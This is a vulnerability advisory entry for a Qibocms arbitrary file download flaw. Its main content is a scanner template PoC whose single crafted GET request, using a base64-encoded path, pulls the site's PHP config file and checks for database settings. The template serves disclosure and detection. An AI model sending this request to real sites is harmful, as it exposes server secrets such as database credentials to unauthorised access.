qibocms-file-download: Qibocms - Arbitrary File Download

日期: 2025-08-01 | 影响软件: Qibocms | POC: 已公开

漏洞描述

Qibocms is vulnerable to arbitrary file download vulnerability.

PoC代码[已公开]

id: qibocms-file-download

info:
  name: Qibocms - Arbitrary File Download
  author: theabhinavgaur
  severity: high
  description: Qibocms is vulnerable to arbitrary file download vulnerability.
  metadata:
    verified: true
    max-request: 1
  tags: qibocms,lfr,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "$webdb"
        condition: and

      - type: word
        part: header
        words:
          - "filename=config"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210081102e77322580e14888ceb9fec96a2534127f46ecbeb9881da943cf43f6d86e022100d8d0886b12699c778b9e86ef12be05ede694bc00e5e1ceee922cbf43b423fe0b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐